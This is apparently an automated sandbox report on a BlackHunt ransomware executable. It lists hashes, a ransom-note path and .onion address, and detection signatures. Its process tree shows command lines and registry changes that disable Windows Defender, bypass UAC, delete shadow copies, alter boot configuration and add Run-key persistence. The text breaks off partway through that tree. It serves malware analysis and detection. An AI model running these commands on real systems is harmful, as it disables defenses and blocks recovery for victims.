Analysis
-
max time kernel
173s -
max time network
182s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:45
Static task
static1
Behavioral task
behavioral1
Sample
bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe
Resource
win10v2004-20231215-en
General
-
Target
bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe
-
Size
707KB
-
MD5
81219b971d78fa20e7c8351f721e32df
-
SHA1
07dcf08017d78429d050ebf651301ef9efc1a8b1
-
SHA256
bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b
-
SHA512
14154d16d7bfdd0b61897495335eb3d44c0aae06b3050e6359340a31d514bbb0a0c48ecfb0c72cb315fcd086bbbe2daf86dbdae70c423ab13917177533eeb883
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1U8Tvnh:6uaTmkZJ+naie5OTamgEoKxLWPTh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2388 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3228 bcdedit.exe 3992 bcdedit.exe -
Renames multiple (515) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3788 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\J: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\X: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\S: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\Z: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\N: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\Y: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\L: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Q: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\U: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\A: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\B: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\E: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\I: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\M: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\R: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\O: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\H: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\K: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\T: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\P: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\G: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\V: bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened (read-only) \??\M: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\lcms.md bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaBrightRegular.ttf bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#BlackHunt_ReadMe.hta bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\dotnet\host\fxr\#BlackHunt_ReadMe.hta bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\Google\#BlackHunt_ReadMe.hta bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\ExpandPop.rar bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\#BlackHunt_ReadMe.hta bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\giflib.md bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\blacklist bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\cmm\PYCC.pf bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_CopyDrop32x32.gif bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\dotnet\host\fxr\8.0.0\#BlackHunt_Private.key bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\7-Zip\Lang\tr.txt bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\lcms.md bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\splash.gif bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.txt bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jpeg.md bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\cursors.properties bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\dynalink.md bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\ecc.md bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\accessibility.properties bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\deploy\#BlackHunt_ReadMe.hta bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\Java\jdk-1.8\legal\jdk\#BlackHunt_Private.key bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\THIRDPARTYLICENSEREADME.txt bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\dotnet\host\fxr\6.0.25\#BlackHunt_ReadMe.txt bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\Java\jdk-1.8\jre\#BlackHunt_ReadMe.hta bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\relaxngdatatype.md bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\Java\jre-1.8\lib\fonts\#BlackHunt_Private.key bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.hta bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\7-Zip\Lang\sa.txt bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\[email protected] bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_LinkDrop32x32.gif bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xerces.md bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\Java\jre-1.8\lib\management\#BlackHunt_ReadMe.hta bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\UnlockResolve.jpeg bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\7-Zip\License.txt bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\joni.md bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\deploy\#BlackHunt_Private.key bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr\profile.jfc bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited\#BlackHunt_ReadMe.txt bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\Java\jdk-1.8\#BlackHunt_Private.key bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libxslt.md bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\amd64\#BlackHunt_ReadMe.hta bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_es.properties bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\sa-jdi.jar bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\psfont.properties.ja bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\dotnet\host\fxr\#BlackHunt_Private.key bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\Google\#BlackHunt_Private.key bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\7-Zip\Lang\hi.txt bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\7-Zip\Lang\ko.txt bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\javaws.jar bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\7-Zip\Lang\ug.txt bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\ExportResume.tiff bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\#BlackHunt_ReadMe.txt bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\cmm\#BlackHunt_Private.key bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_TW.properties bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\RegisterConfirm.wmx bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\7-Zip\Lang\mn.txt bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_CN.properties bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2320 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4864 vssadmin.exe 1304 vssadmin.exe 1692 vssadmin.exe 4712 vssadmin.exe 1720 vssadmin.exe -
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe Token: SeRestorePrivilege 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe Token: SeBackupPrivilege 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe Token: SeTakeOwnershipPrivilege 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe Token: SeAuditPrivilege 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe Token: SeSecurityPrivilege 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe Token: SeIncBasePriorityPrivilege 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe Token: SeBackupPrivilege 5040 vssvc.exe Token: SeRestorePrivilege 5040 vssvc.exe Token: SeAuditPrivilege 5040 vssvc.exe Token: SeBackupPrivilege 3812 wbengine.exe Token: SeRestorePrivilege 3812 wbengine.exe Token: SeSecurityPrivilege 3812 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4732 wrote to memory of 4168 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 93 PID 4732 wrote to memory of 4168 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 93 PID 4732 wrote to memory of 4028 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 95 PID 4732 wrote to memory of 4028 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 95 PID 4732 wrote to memory of 1484 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 97 PID 4732 wrote to memory of 1484 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 97 PID 4732 wrote to memory of 2992 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 99 PID 4732 wrote to memory of 2992 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 99 PID 4732 wrote to memory of 1144 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 100 PID 4732 wrote to memory of 1144 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 100 PID 4168 wrote to memory of 3980 4168 cmd.exe 107 PID 4168 wrote to memory of 3980 4168 cmd.exe 107 PID 1144 wrote to memory of 4792 1144 cmd.exe 106 PID 1144 wrote to memory of 4792 1144 cmd.exe 106 PID 2992 wrote to memory of 4172 2992 cmd.exe 165 PID 2992 wrote to memory of 4172 2992 cmd.exe 165 PID 1484 wrote to memory of 3444 1484 cmd.exe 105 PID 1484 wrote to memory of 3444 1484 cmd.exe 105 PID 4028 wrote to memory of 4916 4028 cmd.exe 103 PID 4028 wrote to memory of 4916 4028 cmd.exe 103 PID 4732 wrote to memory of 1920 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 108 PID 4732 wrote to memory of 1920 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 108 PID 4732 wrote to memory of 4700 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 110 PID 4732 wrote to memory of 4700 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 110 PID 4732 wrote to memory of 1004 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 112 PID 4732 wrote to memory of 1004 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 112 PID 4732 wrote to memory of 3896 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 203 PID 4732 wrote to memory of 3896 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 203 PID 1920 wrote to memory of 2872 1920 cmd.exe 116 PID 1920 wrote to memory of 2872 1920 cmd.exe 116 PID 4732 wrote to memory of 3008 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 117 PID 4732 wrote to memory of 3008 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 117 PID 4732 wrote to memory of 1756 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 119 PID 4732 wrote to memory of 1756 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 119 PID 4732 wrote to memory of 3368 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 121 PID 4732 wrote to memory of 3368 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 121 PID 4700 wrote to memory of 3144 4700 cmd.exe 122 PID 4700 wrote to memory of 3144 4700 cmd.exe 122 PID 4732 wrote to memory of 3644 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 124 PID 4732 wrote to memory of 3644 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 124 PID 4732 wrote to memory of 4408 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 126 PID 4732 wrote to memory of 4408 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 126 PID 4732 wrote to memory of 704 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 127 PID 4732 wrote to memory of 704 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 127 PID 4732 wrote to memory of 2660 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 129 PID 4732 wrote to memory of 2660 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 129 PID 4732 wrote to memory of 4952 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 131 PID 4732 wrote to memory of 4952 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 131 PID 4732 wrote to memory of 2316 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 133 PID 4732 wrote to memory of 2316 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 133 PID 4732 wrote to memory of 4440 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 136 PID 4732 wrote to memory of 4440 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 136 PID 4732 wrote to memory of 2492 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 139 PID 4732 wrote to memory of 2492 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 139 PID 1004 wrote to memory of 2536 1004 cmd.exe 184 PID 1004 wrote to memory of 2536 1004 cmd.exe 184 PID 4732 wrote to memory of 3816 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 140 PID 4732 wrote to memory of 3816 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 140 PID 4732 wrote to memory of 2248 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 141 PID 4732 wrote to memory of 2248 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 141 PID 4732 wrote to memory of 5096 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 147 PID 4732 wrote to memory of 5096 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 147 PID 4732 wrote to memory of 4824 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 146 PID 4732 wrote to memory of 4824 4732 bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe 146 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe"C:\Users\Admin\AppData\Local\Temp\bf27e9fc44f6e43080f919d94b1f89675432b0acd1669c7a60d3243040f48b6b.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4732 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:3980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
